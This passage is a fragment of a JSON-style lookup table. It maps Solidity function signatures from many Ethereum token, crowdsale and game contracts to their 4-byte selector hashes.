"setSectorOwnerCut(uint256)": "0x49ce5804", "BF1Token()": "0x3e32224a", "getDoneAirdropAmount(address)": "0x34d64e50", "getDoneAddresses()": "0x70d290b5", "updateAirdropEndTime(uint256)": "0x9b0ee7b7", "getDistributedTotal()": "0xb8cb40e0", "balanceOfThis()": "0x999eb6b1", "transferOutBalance()": "0x39631849", "airdropTokensBatch(address[],uint256[])": "0xf92cd2b2", "airdropTokens(address,uint256)": "0xf659a45f", "YoutubersCoin()": "0x2ca33e70", "GuoCoin()": "0xbbc894a1", "QoToken()": "0x083d4aa5", "getTotalGoals()": "0xa154aa36", "getReadableContribution()": "0xc65c6eae", "getReadableSupply()": "0x18a51621", "getReadableStats()": "0x7ea31352", "claimTokensFor(address,address)": "0x8f97ad89", "claimMyTokens()": "0x937f2e33", "howManyTokensAreReservedFor(address,address)": "0x750446a3", "howManyTokensAreReservedForMe()": "0x841f3729", "getVirtualBalance(address,address)": "0x24ee9be4", "neymarHasMinted(uint256)": "0xcf63bb83", "RacingToken()": "0x1fbb408a", "CreateTokens()": "0x8e14cc91", "GetTotal()": "0x728064cd", "GetBalance(address)": "0x43e2e504", "ChangeRate(uint256)": "0x5a75aa1c", "ChangeMainWallet(address)": "0xc571627b", "MPhoneSeller()": "0x943fa364", "BaseMPHToken()": "0x84a34caa", "Cyberminer(uint256,string,string)": "0xf273515c", "TUXToken()": "0xaaa40bc7", "VendMultiSigWallet(address[],uint256)": "0x71765e74", "ZENT()": "0xf11c8de8", "emergencyDrain(address,uint256)": "0xac8f539b", "signatureDropMultipleAmount(address[],uint256[])": "0x268bc65d", "signatureDropSingleAmount(address[],uint256)": "0x34c3236a", "twitterDropMultipleAmount(address[],uint256[])": "0x2b556813", "twitterDropSingleAmount(address[],uint256)": "0x88e5581e", "airDropMultipleAmount(address[],uint256[])": "0xb5581663", "airDropSingleAmount(address[],uint256)": "0x6d863fd7", "MooAdvToken(uint256,string,string)": "0xce45f981", "MooToken(uint256,string,string)": "0x53c1b31f", "bulkTransferFrom(uint32[],address,address[],uint256[])": "0x6ab76510", "cut(uint256)": "0x09260db7", "raiseBy()": "0x37f944cc", "INVESTOR_TOKENS()": "0x8cecd03e", "TDEContributorCount()": "0x7e569e66", "crowdSaleAmountRaised()": "0xf30d3ad4", "MULTIPLIER()": "0x059f8b16", "totalPoolOptions()": "0xd852748c", "cryptoAgent()": "0x1b4d02c2", "investorList()": "0xa1f8adac", "totalDropAmount()": "0x3e681375", "allocate2ProjectToken()": "0xfb21364b", "teamUnvested()": "0x62b96a18", "silverBoxAmountForSale()": "0xb5aece02", "contlength()": "0xc885e92d", "tokens_total()": "0xe6ac17a1", "VESTING_1_DATE()": "0x22b930f7", "angelFoundationShareDenominator()": "0xff6307f8", "STARTTIME()": "0xcfd7ab91", "marketKnowledge()": "0xc9d2373b", "saleEnd3()": "0x50e84925", "mintingCompleted()": "0xbf538f6f", "chfScale()": "0x548ad42e", "m_Owner2()": "0x2d9ff1d0", "addressFounders3()": "0x65d9f31e", "halvingCycle()": "0x4813e3e5", "STARTING_SNAKE()": "0xc01b3aa4", "isPromoPause()": "0x5ceb8bc8", "totalLevBlocks()": "0x3328f396", "technicalCommunitySupply()": "0x49b2f5ff", "numberOfTokensPerUser()": "0x5260de57", "getStartDates()": "0xbcd101a6", "ListingContractEntity()": "0x385fbe24", "totalTokenSellAmount()": "0x911fa5c9", "validatorFee()": "0x3f6d8256", "PreTgeDisable()": "0x1785f8dd", "DURATION()": "0x1be05289", "lockState()": "0x46be9c48", "tokensRequiredForAllWins()": "0xf0502ff7", "claim_period()": "0x9583cf17", "PhoenixFund()": "0xfb2eff20", "jackpotCompleted()": "0xa76774f5", "numImports()": "0x7e03ad1a", "minimumMakerProtocolFee()": "0x7ccefc52", "peculOld()": "0xfeddb41c", "ctu_owner()": "0xc6b4ad80", "getPurchaseETHNum()": "0xef616584", "agaisnt_votes()": "0xed5863f6", "softCapUSD()": "0xe621b149", "activateICOStatus()": "0xe487e87b", "tier1()": "0xbb6b13a1", "transferProposalCooldown()": "0x939528b1", "fundingCap()": "0xe3b2594f", "PRIORITY_SALE_START()": "0x640708d6", "beneficiaryStake()": "0xb0792570", "currentSaleStage()": "0x9af041aa", "isOracle()": "0x9a82f890", "CrowdsaleContract()": "0xd391ce7a", "weiForPayment()": "0x6fa668f3", "teamTokenTimelock()": "0x322a8957", "membership()": "0xa2bf68b9", "lastBlock_f7()": "0x9c04ece9", "stageTwo()": "0x3b895f28", "dividend_amount()": "0x8cc40d71", "episodeManager()": "0x02c2a74d", "upgradedContract()": "0x53b8e278", "chargeBonuses()": "0xbc7411b2", "_v4()": "0x0be702bf", "p_wallet()": "0xce99151e", "partnersPercent()": "0x4509fd81", "ORACLIZEQUERYMAXTIME()": "0x7ea17a1d", "reserveWaveTokens()": "0xf232880d", "pieceprice()": "0x127f1068", "ICOprice()": "0x99444e30", "sponseeAddress()": "0x262af333", "ATTR_TRADABLE()": "0x6d18dc63", "contributorsPeriodsElapsed()": "0xd36b9e64", "isICORunning()": "0x34253af5", "totalAirDropped()": "0x71c78ce7", "randomAddress()": "0xd5bee9f5", "targetDiscountValue2()": "0xec412e00", "secondStageTokensForSale()": "0x18dd97f0", "buyCommission()": "0x8729fff4", "exchangeEtherForHavvens()": "0x3f541ffc", "TOKETH_PRESALE_TWO()": "0xa3eb6436", "maxTokenSupplyPublicSale()": "0x9b0aac15", "executeTransfer()": "0x835d2d2e", "RATE2()": "0x73357018", "sellStartTime()": "0xcb60f8b4", "creditCEO()": "0x4c12f8bb", "TOKENS_NOT_FOR_SALE()": "0xe23e231f", "INIT_TOKENS()": "0x9250640d", "thirdPeriod()": "0x9e439ff8", "numberOfBlocksBetweenSupplies()": "0xef7f23a6", "numOfDeliveredCrowdsalePurchases()": "0x9e3d0636", "MaxPlayers()": "0x87d14a36", "step()": "0xe25fe175", "shutThatShitDown()": "0xc227cee0", "isFinish()": "0x2c8ca0ea", "forCommand()": "0x697fa3e6", "numPositions()": "0x5e71823b", "taxAddress()": "0xb7bda68f", "getVendingStepQty(uint256)": "0x36d61112", "getVendingStepPrice(uint256)": "0xd719843f", "getVendingPrice(uint256)": "0x43b5126d", "getVendingAmountSold(uint256)": "0xcdd2067e", "getVendingAmountLeft(uint256)": "0x0b1fc3c0", "vendingCreateCollectible(uint256,address)": "0x6e4647d6", "createVendingItem(uint256,uint256,uint256,uint256,uint256)": "0xd4e823a3", "setVendingStepValues(uint256,uint256,uint256)": "0xa870be8a", "setVendingStartPrice(uint256,uint256)": "0xd5065090", "setVendingAmount(uint256,uint256)": "0xaf59c789", "setVendingAttachedState(uint256,uint256)": "0x771c3ec7", "wcapToken()": "0xdddaf901", "grantTokens(address)": "0xb3d2b441", "MyPurchaseContract(address)": "0x86115c1d", "setGrantEnable(bool)": "0xb47df046", "setEnablePurchase(bool)": "0x83852cf6", "setPurchaseAdmin(address)": "0x36b2fe94", "PurchaseAdmin()": "0x6753fc59", "CommunityCoin()": "0x075f8ec2", "TimoNetwork(uint256,string,string)": "0xb7a311fd", "getDividendIndex(uint256,int256)": "0x40079df0", "calculateDividend(uint256,address)": "0x5bea0e1c", "reclaimDividend(uint256)": "0xaa8b76ea", "pullDividendPayment(uint256)": "0x30008b48", "pushDividendPayment(uint256,uint256,uint256)": "0xe1726faa", "pushDividendPaymentToAddresses(uint256,address[])": "0x4d58e413", "createDividendWithCheckpoint(uint256,uint256,address,uint256,uint256,int256)": "0x06b28cec", "createDividend(uint256,uint256,address,uint256)": "0x77bbf28a", "CakeToken()": "0x7ed4e321", "getCoinsSinceLastHatch(address)": "0x6cb5d070", "getMyCoins()": "0x43b114fd", "getMyStrippers()": "0x19a3d0bb", "getFreeStrippers()": "0x020bdf54", "calculateCoinBuySimple(uint256)": "0x726ea051", "calculateCoinBuy(uint256,uint256)": "0xb89c70c0", "calculateCoinSell(uint256)": "0x1c3de07a", "sellCoins()": "0xf5991a05", "hatchCoins(address)": "0x4db4eff0", "CryptoStrippers()": "0x8f52d420", "BAKEToken()": "0xab3c04d3", "withdraw_token(address,uint256)": "0xea932954", "mergeMedal(uint256,uint256)": "0x81a09bf0", "issueSuperMetal(address,uint256)": "0x3494f222", "issueMedal(address)": "0xd8e223b5", "getMedalInfo(uint256)": "0x123c3ada", "DapdapNiubi()": "0xbe007380", "GMCCERC20(uint256,string,string)": "0x8dc2a2cd", "BKFToken()": "0x7e86e0f2", "revokeOracle(address,uint256)": "0x6d540318", "buyOracleFor(bytes,address,address)": "0xdb8374ee", "buyOracle(bytes,address)": "0x9a10f819", "confirmOracle(address,uint256)": "0x8966768f", "modifyOpenStatus(bool)": "0x400002c4", "changePaymentToken(address)": "0x4558d717", "upgradeOracle(address)": "0x95127634", "OrbusToken()": "0x4193e15f", "bountyOf(address)": "0x94412943", "UNGTToken(uint256,string,string)": "0x363df59a", "getSeedsSinceLastHatch(address)": "0x0e336f00", "getMyRice()": "0xd62f0f22", "hatchSeeds(address)": "0xb7dea35f", "RiceFarmer()": "0xfd4e165e", "CashTelexToken()": "0xc26b7ce9", "OLIFEToken()": "0xd27ffef1", "KillahyToken()": "0xdf88401c", "updateSymbol(string)": "0x537f5312", "EndQuestion()": "0xb18de618", "QuestionIs(string,string)": "0x8281feaa", "checkIfCustodiesServedBBD(address[])": "0xe7fbee28", "checkIfCustodiesServedETH(address[])": "0x30cddc83", "getTotalBalanceFor(address)": "0xa8f9868e", "finishSettlement()": "0xb08480d4", "settleBBDBatch(address[],int256[],uint256)": "0x05ed2cd3", "settleETHBatch(address[],int256[],uint256,uint256)": "0x63f2493f", "startSettlementPreparation()": "0xcd6c4bb0", "withdrawTokensFromCustody(address,uint256,address,address)": "0xe2f779f3", "withdrawFromCustody(uint256,address,address)": "0x37305e2a", "withdrawFromManager(uint256,address)": "0x9cc74299", "createCustody(address)": "0x4f64808d", "setBBDPrice(uint256)": "0x4f734965", "rmExchangeAccount(address)": "0x2db2caef", "addExchangeAccount(address)": "0x049c9bf2", "addOwnerAccount(address)": "0x412282cd", "updateHeartBeat()": "0x1bd61eee", "setCustodyFactory(address)": "0x529e6713", "newGame(string,bytes32)": "0x780aee73", "startGame(string,string)": "0x044c96e4", "AEFTOKEN()": "0xe796818e", "EngkusTechResearch()": "0x2ef9b4aa", "_checkPixelIdExists(uint256)": "0x27bb2d82", "getAllPixels()": "0x70d72d63", "createPixels(uint256)": "0x45680e09", "finisGame()": "0xb3e18ed9", "_rand(uint256,uint256)": "0x4d586512", "_sendWinnerJackpot(address)": "0xd6fb69b9", "sendOwnerCommission()": "0x5c39b671", "setUsername(string)": "0xed59313a", "TokenOfEightSilver()": "0x171d9243", "TokenAUC(uint256,string,uint8,string)": "0xe90dae86", "Hellob()": "0xa8df80ad", "token_issued()": "0xbaf30051", "saleAllocated()": "0x25dfcf84", "unlockStep()": "0xa454c5dc", "boxPrice()": "0xa6482858", "round1Cap()": "0xd87ce037", "previousRoundsCount()": "0xeac8221e", "BTNSold()": "0x0d882848", "betHash()": "0xd6787711", "ADVISER_STAKE2()": "0x3eb578bf", "deathData_f15()": "0x50473c82", "weiDelivered()": "0xfc12dfc7", "SELL()": "0x205730fd", "bugFund()": "0xd1153f25", "hashOfTheDocument()": "0x71edfe35", "DX()": "0xcfb079d3", "endPeTime()": "0x287ad3e5", "nextForkBlockNumber()": "0x79164773", "earlyBirdCap()": "0x39293113", "getProjectUnusedTokens()": "0xf4320f00", "maxRewardUnitsAvailable()": "0x21486833", "isClearTime()": "0x088266b5", "m_hodlers()": "0x0b2f6cef", "hodlerTotalCount()": "0x26c43d8f", "eosShareDrop()": "0x7ec54bdc", "forLottesy()": "0x9a42c935", "lastPurchaseTime()": "0xc14bafb1", "MAX_PREMIUM()": "0x4cdabb16", "tokensLimit()": "0x5b25ed6a", "WETH()": "0xad5c4648", "UNDERWAY_STATUS()": "0xea885b55", "isTransPaused()": "0x891c738a", "upgraderSet()": "0x045a1796", "setDiscountValueOn()": "0x9c9ef44a", "notCollectedAmountAfter24Hours()": "0x9b5696b0", "dec_multiple()": "0x04143865", "streamerContractMaxAmount()": "0xf597d097", "TEAM_WALLET()": "0x2b905bf6", "accumulatedInput()": "0xd2cc718f", "periodITO_hardCapInWei()": "0x4536be70", "BRONZE_AMOUNT_SKL()": "0xef7a5956", "RESERVE_TOKENS()": "0xc35d1e01", "isContractMiniGame()": "0x3281d576", "CLE_Beta_Pictoris()": "0xd15d2745", "shortAirdropTime()": "0x3b968963", "fciDecimals()": "0xe854eeb3", "privatePresaleSupply()": "0x5581be8d", "PROPOSED_STATUS()": "0x8276bd19", "waitPeriod()": "0x8e26c09d", "ETH_TO_QST_TOKEN_RATE()": "0x0d285d8c", "maxTokensPerArticle()": "0x317c00be", "managerKey()": "0xca58a06c", "option30name()": "0x793cf430", "ADMINS_COUNT()": "0x75cc90b3", "mininglock()": "0xaaa71e45", "tokenObj()": "0x411e6832", "totalBetAmount()": "0x613f4594", "sigDestinationTransfer()": "0x81d96005", "MAX_WITHDRAW_PCT_TX()": "0x743bdcef", "betMaxAmount()": "0xd884a322", "switchSaleState()": "0xefc4f1dc", "BLOCKREWARD()": "0xf2477f7c", "soldDragons()": "0x71443c4d", "whaleStartTime()": "0xde06ef49", "goldmintTeamAddress()": "0x957aa3d1", "tokenKoef()": "0xcfe0a5dc", "sanTTTCost()": "0xf569626d", "maxIncrease()": "0x5dfc3459", "lockupPeriod()": "0xee947a7c", "openingTimePeriodTwo()": "0xfeb088ab", "tokenDistributionDuration()": "0xf91f87f2", "hardCapDividends()": "0x8553f6fb", "startScoring()": "0x098deeb5", "postDisputeEth()": "0x610e9ed0", "addressOfTokenUsedAsReward3()": "0x21241e44", "invcoinSentToEther()": "0xe1f16616", "advisorAllocatedTime()": "0x3a22a593", "PRE_FUNDING_GOAL()": "0x96bc2287", "seeAllPlayers()": "0xb57e55ec", "landingDiscount_ppc()": "0xba80e058", "PRCT_ETH_OP()": "0x24e1c3f3", "soldTokenValue()": "0x1e6288fa", "isEthernautsExplore()": "0x4da5d4c0", "oscarGuindzbergAddress()": "0x2d59ea6c", "_decimals()": "0x32424aa3", "awardsCount()": "0xccf9f35f", "amountTotal()": "0xa73c7140", "targetTime()": "0x45d8a232", "periodICOStage5()": "0x9caeab45", "feerate()": "0x09f80dd9", "raisedEther()": "0xa559217c", "Max_CAP()": "0x527c08ec", "indexThreads()": "0xd9a7556f", "dev_allocation()": "0x3143fd60", "TEAM_LOCK_TIME()": "0x4d057803", "lastBlock_f11()": "0x48ed190a", "last_winner()": "0x8298c5dc", "deadlinePreIcoTwo()": "0x15e1146b", "showMyEtherBalance()": "0x42a37176", "sumHardCapICOStage7()": "0x9cf2c727", "personalisationCost()": "0x29337bda", "NenoToken()": "0x431851ad", "unfreezeAll()": "0x66c5c4a0", "showAddresses()": "0xf4a67395", "inArray(address)": "0xdeac4659", "winnovate()": "0x99b632e4", "itsLikeChicago()": "0x611f1fbe", "VoteOnMyTeslaColor()": "0x95c47416", "PonzICO()": "0x85fbd17f", "BTCAir()": "0x5d22e222", "Robincoin(uint256,string,string)": "0x07c430bd", "RobincoinERC20(uint256,string,string)": "0x4b4c01f4", "calculateTotalPayoutAmountAndCommission()": "0x00f2c41b", "isRefundTime()": "0x3c24550c", "PegasusToken()": "0x1403041b", "canClaimPayout()": "0x31d90e04", "canClaimRefund()": "0x05f6237f", "queryWinningTeam(uint256)": "0xa2302af9", "EmClassic()": "0xe13380e9", "BethingWorldCup()": "0x03cc8efb", "BTCET()": "0xb14904b4", "EPSBets()": "0x47dd5138", "reset(address,address,address,address,address,address)": "0x1e639798", "signBBODocument(bytes32,bytes)": "0x30abf433", "getUsersByDocHash(bytes32)": "0x2b664d8a", "verifyBBODocument(bytes32,bytes)": "0x28918296", "setNumRewardsAvailableForAddress(uint256,address,address)": "0xd05c9ad6", "disToken(address)": "0x27af1d98", "distributeToken(address,uint256)": "0x2ca9cbe8", "buyTokenFrom(address,address,uint256)": "0xe44de421", "setIsBuying()": "0xeebcd477", "cancelSellingToken(address)": "0xe01cd37a", "setSellingToken(address,uint256,uint256)": "0x558b5aab", "userRefundWithoutGuaranteeEther()": "0x59208b8a", "TIA()": "0xa5c978c0", "checkSellerGuarantee(address)": "0xb7acbd41", "setSellerGuarantee(bool,uint256)": "0xf7a06a88", "isBadToken(address)": "0x16188c79", "removeBadToken(address)": "0x0e91f4b3", "addBadToken(address)": "0xb11894c9", "SixtusToken()": "0xd75f0dd6", "Erc20TokenMarket()": "0x02e2f0b6", "_userRefund(address,address)": "0x97af90ae", "userRefundTo(address)": "0x3410eb5b", "paused(bool)": "0x837150cf", "ProdPresale()": "0x7b2ca96c", "Presale(address,address,address,address,uint256,uint256)": "0x6bd6775f", "withdraw3(address)": "0x1bad5558", "withdraw2(address)": "0x4eea9a8d", "withdraw1(address)": "0xf569a2fc", "CommonTokensale(address,address,address,address,uint256,uint256)": "0x694702ec", "MintyMcCringleToken()": "0x8436bd4e", "UETH()": "0x82d2dcfb", "Divest(uint256)": "0xb0a94ef7", "depositAndWithdraw(uint256)": "0x1a3142bd", "IsDistribRuSTMingFalg_()": "0x8e8fe845", "ChendeWorld()": "0xc56c89a2", "setDeputy(address)": "0x2f18a920", "releaseMultiWithStage(address[],address[])": "0xdde4f41a", "RHYNOTE()": "0x2578e943", "CryptoGiants()": "0x8b2c434c", "quoteBid()": "0x015854f8", "quoteAsk()": "0x8cbfa1ec", "_createFilm(string,address,uint256)": "0xf6fb4c9a", "allFilmsInfo(uint256)": "0xa86abb3d", "AvatechToken()": "0xe21ac8a1", "getFilm(uint256)": "0x3351886e", "create18FilmsTokens()": "0xb36117b2", "createFilmToken(string,uint256)": "0x3ca5c8b8", "getBuyerReceipt(address)": "0x5f22c42f", "getAllReceipt()": "0x3dcd351f", "LuckyNumberImp()": "0xa29063c1", "getRand(uint256,uint256)": "0x4173ffbc", "MotionToken()": "0x4570160e", "ZHOUToken()": "0x2b876784", "dispatchRewardToken()": "0x01307338", "returnFunding()": "0x038f1845", "Boostmi()": "0xee84c008", "returnRemainRewardToken()": "0x01c835e5", "Crowdsale(address,uint256,uint256,uint256,uint256,address,address)": "0xfec35182", "airdropToken()": "0x4d06068a", "FGorToken()": "0x81676ecd", "internalExecuteDelegatecall(address,uint256,bytes)": "0x5006bf0b", "createEntry(string,string)": "0xc1908360", "internalExecuteCall(address,uint256,uint256,bytes)": "0xf199265f", "changeMinimumDonation(uint256)": "0xb5b5a057", "getRefundGasAmount(uint256)": "0xeec2898a", "changeDonationWallet(address)": "0x5ab3ded3", "validCall(uint256,bytes)": "0xd47eb8ee", "DonationGuestbook()": "0x923e2645", "validDestination(address)": "0x1a3e5457", "createContract(bytes)": "0x90042baf", "executeSignedCall(address,uint256,uint256,bytes,bytes)": "0x5eb61aa9", "resolveEntityAddressAndOwner(address)": "0x9bead36f", "resolveEntityAddress(address)": "0x6fe3ef7c", "onlyBouncerCreateContract(bytes)": "0x7ae77ecf", "emitEntityResolution(address,address)": "0x2c70b7ca", "onlyBouncerTransferOwnership(address)": "0x35fb2125", "createVirtualAddress()": "0x5defaec6", "onlyBouncerExecuteCall(address,uint256,uint256,bytes)": "0xd97cf075", "createEntity(address,address)": "0xf52f77b2", "SECOND_USER_CUT()": "0x50e28cb3", "uniqueContributors()": "0xd312846b", "SoldToken()": "0xf88b07a3", "GetFreebie()": "0x6ea3f1cb", "m_categoriesCount()": "0xa0efe255", "nextGameMinBlock()": "0x0c21a2f1", "itemNum()": "0xeaf2a5ef", "minAcceptedAmount()": "0xf1d841f1", "googleSupply()": "0xcf35238a", "EADC()": "0xcbaba70f", "MaxReleasedBac()": "0xaf6c3021", "icoEtherReceivedPrivateSale()": "0x8e63ef75", "sklToken()": "0xb2a7239d", "DEVCLASS()": "0x6b489028", "fluffyCatCut()": "0x771acf31", "expireTimeLimit()": "0x556665db", "IDX()": "0x2e71e68f", "autopayfee()": "0x9d1be930", "windowBonusStep2()": "0x9c3723df", "PHOENIX_CORSAIR()": "0x577f7133", "seedAmount()": "0xc5774a3f", "addcoinfee()": "0xba7bf7ff", "crowdsaleAirdropAddress()": "0xb9689cf3", "purchaseCount()": "0x2b85ed9c", "getRemainingEthAvailable()": "0xda074874", "currentIteration()": "0x88c6abf8", "totalLendingFiatAmount()": "0xdee1bfbe", "maxPreSaleStage()": "0x83318574", "TOKEN_AMOUNT_ICO_STAGE1_PRE_SALE4()": "0x40b80684", "gymContract()": "0xe66d4694", "currentStageNumber()": "0x4343ede6", "Mint()": "0x34c73884", "ICO_START()": "0xd0ca12ba", "FileName()": "0xbf65d492", "isPurchasePossible()": "0x835c6386", "lastBlock_v15()": "0xf87eac7f", "OsherCurrentICOPrice()": "0xc8bd3782", "exchangeContract()": "0x3f0a0797", "totalissue()": "0x2b337152", "DURATION_PER_VESTING()": "0x966933ce", "LOCKAMOUNT4()": "0x7dc28eb2", "withdraw_bounty()": "0xa9726c1e", "encoding_format()": "0xce52cf84", "finalizeRemainders()": "0x2276774c", "getBonusByTime()": "0xc399330d", "dispatcher()": "0xcb7e9057", "companyTimeLock()": "0xd99dd314", "Available()": "0x9ec7888f", "unit()": "0x907af6c0", "_getTimeLeft()": "0xb3de5cc0", "stopFlagOff()": "0x91373711", "econReserveAllocation()": "0xb9c1a60a", "availablePositions()": "0xd1c06b2f", "finalCap()": "0x35fb337c", "reward8()": "0x519bf602", "totalLevelValue()": "0x727a666a", "teamTimeLock()": "0x38dacaab", "deposits_refunded()": "0x122809dc", "c_priceRiseTokenAmount()": "0x32e5d676", "DRAIN_DELAY()": "0xc99f3357", "remainingPoolOptions()": "0xaa864e49", "releasedRecordsCount()": "0x0897bf6f", "maximumIssuerReservedUnits()": "0xb7e43a84", "PreIcoSupply()": "0x08c572b8", "MyWhiteList()": "0x7870f889", "curBubbleNumber()": "0x6f59a5cc", "tokensIssuedForBonusRangeFour()": "0x07df3fa4", "producedSilverCaps()": "0x266fc436", "endAt()": "0x7cc3ae8c", "nextGamePotSplit()": "0x6a68d2d5", "saucePoolTotal()": "0xbedbb1a5", "secondPriceTime()": "0x3a1d9a7d", "distributed_team()": "0xf73a590c", "foundersFundTimelock1Address()": "0x4446c98c", "preSaleMinPaymentWei()": "0x8a007d86", "tournamentIncentiveCut()": "0xa43b92a2", "burnPausedTime()": "0x261cb08a", "TOKEN_TOTAL_CAP()": "0xc806a91d", "documentIPFSHash()": "0x02337657", "votingPeriodStartTime()": "0xe55a6ef6", "affiliateUtility()": "0xa107ceb6", "minimumPayment()": "0x94ef987e", "walletOne()": "0x1cdce200", "ALC_FUNDATION_ADDRESS()": "0xbc112fa3", "ref_percent()": "0xfaa5e124", "totalLenderBalance()": "0xe47dace5", "comission()": "0x3a4b4532", "tokenInfoParametersReady()": "0x944f0e64", "airDropFinished()": "0x512f9890", "Addr6()": "0x24e65e14", "team()": "0x85f2aef2", "playerBalance()": "0x651f066a", "testMode()": "0xcd9ea342", "penaltyFraction()": "0x7c48f8e7", "debt()": "0x0dca59c1", "tokenContractSupply()": "0x9d5efb6b", "endPresaleTime()": "0x1264299a", "maxTokenNum()": "0x75c9f351", "ownerMethod()": "0xe166b756", "MAX_CONTRIB_CHECK_END_TIME()": "0x857ba7fb", "getCountApplyForCertification()": "0x3c1a7c6f", "getCountCourse()": "0x9ccd0b51", "MasAnu()": "0x505c3c58", "checkWithdrawValueForAddressFX(address,uint256)": "0xfe353a5e", "checkWithdrawValueFX(uint256)": "0xd7796915", "withdrawalFX(uint256)": "0x62bca778", "allocatetokensAndWL(address,uint256)": "0x3cef162a", "sendTokensAfterBuy(address,uint256)": "0xa39f9712", "ETC(address,uint256)": "0x47102a5d", "destroyBlockFunds(address)": "0x1a9b70f2", "checkGoalReach(uint256)": "0x37e12ab7", "newCrowdFundingCampaign(address,uint256)": "0xc0689e2d", "expropriate(uint256)": "0x97d6daba", "createAndTransfer(address,uint256)": "0xa176d7c9", "setUsdRate(uint256)": "0xdf3cc390", "removeWhitelister(address,address)": "0xe84c9d5c", "addWhitelister(address,address)": "0x05b575a5", "SendTokens(address,uint256)": "0x09bd3894", "endPrivateIco()": "0x39269596", "startPrivateIco()": "0x0cbf7ec0", "WellnessToken()": "0xdd1a56a7", "getLastNReadingsByDeviceId(uint8,uint8)": "0x06c3f137", "getAllDevices()": "0x7a2a530d", "getDeviceById(uint8)": "0x3a842044", "addReading(uint8,uint256,uint256)": "0x0485066e", "TestRo(uint256,string,uint8,string)": "0xee40b9bc", "GambangCoin()": "0xf81d29df", "increaseBalance(address)": "0xe1472d88", "getMyHolding()": "0x19fc3b9d", "setTokennCrowdsale(address,uint256)": "0x8f3b8c3a", "MaPToken()": "0xe6175794", "SlashToken()": "0x4435f1c3", "OzoneToken()": "0x2b8f899e", "HelperSearchToken()": "0xec93a081", "MORTU()": "0xba02cf47", "batchTokenTransfer(address[],uint256[])": "0x93ea0e02", "GexAlloc(address)": "0xeecd8876", "PisangChain()": "0x24ad35e1", "BMV()": "0x3588aa0b", "amountInLock(address,uint256)": "0x76d57aad", "transferToLock(address,uint256,uint256)": "0xcd943e54", "Thecap()": "0xa18f7567", "setRedeemRequestLimitInterval(uint256)": "0xadfdb75e", "setRedeemRequestLimit(uint256)": "0xe498b98f", "setBuyRequestLimitInterval(uint256)": "0x0cf039e3", "setBuyRequestLimit(uint256)": "0xcd51bcae", "clearRequests()": "0x39a9e6c5", "isRedeemLocked(address)": "0x462b2fca", "isBuyLocked(address)": "0x1420765a", "getBuyRequestsLength()": "0xf6618bab", "getRedeemValue(uint256,address)": "0x06fdf75d", "HybridEXToken(address,uint256)": "0x17ba169a", "addAlpha(string,string,bytes32)": "0x12aa5360", "deleteWebsite(address)": "0x6f1a78cc", "_isLatitude(int256)": "0xacf3508e", "_isLongitude(int256)": "0xd788a945", "_batchPopularitySetting(uint256[],uint8[])": "0x6c060a7a", "_popularitySetting(uint256,uint8)": "0xeb51e2e4", "_batchActivenessUpgrade(uint256[],uint256[])": "0x30bb7499", "_activenessUpgrade(uint256,uint256)": "0x08bd6e4e", "_batchBuild(uint256[],int256[],int256[],uint8[])": "0xa58180b4", "_build(uint256,int256,int256,uint8)": "0x0da03197", "_isBuilt(uint256)": "0xcacfa24a", "_building(uint256)": "0x2471fa1c", "ManoloToken()": "0x4e3d2745", "transfer(address,address,address,address[],uint256[])": "0x46d0a022", "MinerOneCrowdsale(address)": "0xd7b4a7f6", "payoutToAddress(address[])": "0x6cfb2c9c", "getDividends(address)": "0x4634d81c", "setFounderAddress(address)": "0x1a08b189", "withdrawAdvisorFunds()": "0xf38b0585", "withdrawFounderFunds()": "0x7b2e5086", "setContributionLevel(address,uint8)": "0x9e29739e", "_getTokenAmount()": "0x5ed4d7ae", "_allocateTokens(address)": "0x2f83e16d", "buyTokensByProxy(address)": "0x62a4be31", "Apollo()": "0xc690c9a5", "setMinweiAmount(uint256)": "0x422b1c70", "setMaxweiAmount(uint256)": "0x01ce616f", "MonthToken()": "0x0552ce3e", "getFreeEggs()": "0x22e58557", "claimFreeEggs()": "0xae20bf15", "potFee(uint256)": "0xce8883af", "_hatchEggs(address)": "0x2083c730", "stealPot()": "0x421a5727", "getPotCost()": "0x23d7e089", "finalizeIfNecessary()": "0xcf99d935", "NxahCoin()": "0x6378378a", "Dimacoin()": "0xa414e089", "WavesToken()": "0xb8c375b6", "TxUserWallet()": "0x056b2300", "Robycoin_test1()": "0xf039218a", "DTFCToken()": "0x56605326", "ClaireToken()": "0x854cd978", "test3Args()": "0xa022ac81", "multiTransferEth(address[],uint256[])": "0x73918980", "withdrawEarnings(uint256,bool)": "0xa95d580c", "reLoadXid()": "0xa936c203", "AntCoin()": "0x77d1f95d", "issuePartnerTokens(uint256)": "0xf69bf03b", "neironixProfitAddress()": "0xe693e4d1", "gameEncryptedText()": "0x7d478407", "futDevAddr()": "0x5d2946f5", "level_8_amount()": "0x5b472771", "dutchAuctionToCraft()": "0xf60daa71", "TEAM_VESTING_WALLET()": "0xb5417a52", "getAirDropedToday()": "0x54149777", "presaleClosingTime()": "0x72cfea69", "CafePayed()": "0x6033abd5", "dividendRoundsBeforeFoundersStakeUnlock()": "0xcfc2a93e", "wallet1()": "0x1a026c96", "ADVISOR_TOKENS()": "0xe29121de", "amountTokenIssued()": "0xe1e073b6", "timeBetweenRounds()": "0x6666d22c", "product2_luckybuyTracker()": "0x4d1bd1fa", "rateAngelDayEnd()": "0x1722a8b0", "CROWDSALE_OPENING_TIME()": "0x0d5a5c32", "crowdsalePaused()": "0x317830b4", "collectedFee()": "0xe811f50a", "founderTokenWithdrawnPhase1()": "0x52c9b906", "preIcoStartBlock()": "0xac194b07", "END_DURATION_BETTING_BLOCK()": "0x79bd42cf", "salvageFinished()": "0x2cad9404", "WHITELISTED_PREMIUM_TIME()": "0x7a186ebf", "window3EndTime()": "0x053e3253", "vestContract()": "0xbe4663a1", "week_winner()": "0xa346e536", "etherCap()": "0x7228b9db", "UINT256_MAX()": "0xd0949f99", "tkcAddress()": "0xc4b40fb7", "releasePrivateSupplyVested()": "0x99d792a2", "FOUNDERS_SUPPLY()": "0x98ca667f", "minPotSum()": "0x5d506a2e", "affiliatThreshold3()": "0xb4f5b9b9", "safe_add(uint256)": "0x3e127e76", "networkState()": "0xd081b9f5", "carIdToRenter(uint256)": "0x3df96853", "info_Symbol()": "0x56b83dc5", "airBegintime()": "0xe67ad254", "giftCard(uint256,address)": "0xc28b4369", "imageAddress(address)": "0xf2da1f0a", "month12Unlock()": "0x0a2d7629", "addressFoundersShare()": "0xb36752ee", "priceStage2()": "0x36c802a0", "pregnantDogs()": "0x3369c33d", "createCardForAcquiredPlayers(uint256[],address)": "0x9f659296", "TOKENS_SOLD_LIMIT()": "0xf450e5f8", 